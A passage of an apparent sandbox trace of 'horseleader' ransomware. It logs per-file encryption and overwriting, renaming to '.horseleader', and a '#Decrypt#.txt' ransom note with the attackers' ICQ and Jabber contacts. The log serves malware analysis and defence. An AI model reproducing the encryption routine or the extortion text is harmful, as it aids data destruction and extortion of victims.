uy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.724] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.724] CloseHandle (hObject=0x158) returned 1 [0250.724] GetProcessHeap () returned 0x780000 [0250.724] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.724] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2d148, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0250.724] lstrcmpiW (lpString1="vstoee.dll", lpString2="Windows") returned -1 [0250.725] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0250.725] StrStrIW (lpFirst="vstoee.dll", lpSrch=".horseleader") returned 0x0 [0250.725] lstrcmpW (lpString1="vstoee.dll", lpString2="#Decrypt#.txt") returned 1 [0250.725] lstrcmpW (lpString1="vstoee.dll", lpString2="_uninstalling_.png") returned 1 [0250.725] lstrlenW (lpString=".testttjffg") returned 11 [0250.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll", lpSrch=".testttjffg") returned 0x0 [0250.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned 66 [0250.727] StrStrW (lpFirst="vstoee.dll", lpSrch=".txt") returned 0x0 [0250.727] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=184648) returned 1 [0250.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.727] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.730] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.730] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x140a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.731] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.732] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.732] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.732] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x28148, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.732] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.737] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.737] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.737] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.737] CloseHandle (hObject=0x158) returned 1 [0250.738] GetProcessHeap () returned 0x780000 [0250.738] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.738] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.horseleader") returned 78 [0250.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.horseleader")) returned 1 [0250.739] GetProcessHeap () returned 0x780000 [0250.739] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.739] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c693e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x3f50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0250.739] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="Windows") returned -1 [0250.739] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0250.739] StrStrIW (lpFirst="vstoee100.tlb", lpSrch=".horseleader") returned 0x0 [0250.740] lstrcmpW (lpString1="vstoee100.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.740] lstrcmpW (lpString1="vstoee100.tlb", lpString2="_uninstalling_.png") returned 1 [0250.740] lstrlenW (lpString=".testttjffg") returned 11 [0250.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb", lpSrch=".testttjffg") returned 0x0 [0250.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb") returned 69 [0250.741] StrStrW (lpFirst="vstoee100.tlb", lpSrch=".txt") returned 0x0 [0250.741] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16208) returned 1 [0250.741] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f50, lpOverlapped=0x0) returned 1 [0250.743] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc0b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f50, lpOverlapped=0x0) returned 1 [0250.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.744] CloseHandle (hObject=0x158) returned 1 [0250.745] GetProcessHeap () returned 0x780000 [0250.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.horseleader") returned 81 [0250.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee100.tlb.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.horseleader")) returned 1 [0250.748] GetProcessHeap () returned 0x780000 [0250.748] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.748] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c8f540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5550, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 [0250.748] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="Windows") returned -1 [0250.748] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0250.748] StrStrIW (lpFirst="vstoee90.tlb", lpSrch=".horseleader") returned 0x0 [0250.748] lstrcmpW (lpString1="vstoee90.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.749] lstrcmpW (lpString1="vstoee90.tlb", lpString2="_uninstalling_.png") returned 1 [0250.749] lstrlenW (lpString=".testttjffg") returned 11 [0250.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb", lpSrch=".testttjffg") returned 0x0 [0250.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.749] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.750] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb") returned 68 [0250.751] StrStrW (lpFirst="vstoee90.tlb", lpSrch=".txt") returned 0x0 [0250.751] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=21840) returned 1 [0250.751] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.753] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.753] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x550, lpOverlapped=0x0) returned 1 [0250.754] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffab0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.754] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x550, lpOverlapped=0x0) returned 1 [0250.754] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.754] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.755] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.755] CloseHandle (hObject=0x158) returned 1 [0250.755] GetProcessHeap () returned 0x780000 [0250.755] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.755] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.horseleader") returned 80 [0250.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee90.tlb.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.horseleader")) returned 1 [0250.756] GetProcessHeap () returned 0x780000 [0250.756] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c8f540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x5550, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 0 [0250.756] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.756] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\#Decrypt#.txt") returned 69 [0250.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.757] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.757] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.758] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.758] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.758] CloseHandle (hObject=0x21c) returned 1 [0250.758] GetProcessHeap () returned 0x780000 [0250.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.759] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0250.759] lstrcmpiW (lpString1="Web Folders", lpString2="Windows") returned -1 [0250.759] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned 62 [0250.759] lstrcmpW (lpString1="Web Folders", lpString2=".") returned 1 [0250.759] lstrcmpW (lpString1="Web Folders", lpString2="..") returned 1 [0250.759] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.759] GetProcessHeap () returned 0x780000 [0250.759] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.759] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*") returned 64 [0250.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.761] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\.") returned 64 [0250.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.761] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\..") returned 65 [0250.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 